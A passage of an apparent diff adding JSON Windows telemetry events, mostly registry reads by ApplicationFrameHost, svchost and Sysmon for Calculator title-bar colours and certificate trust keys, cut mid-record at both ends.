5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "CapabilityAccessManagerClient.dll", + "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cellulardatacapabilityhandler.dll", + "image_path": "C:\\Windows\\System32\\cellulardatacapabilityhandler.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 